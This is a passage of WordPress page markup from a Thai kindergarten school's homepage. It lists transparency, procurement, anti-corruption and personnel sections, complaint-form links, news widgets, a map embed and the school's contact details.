-->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; 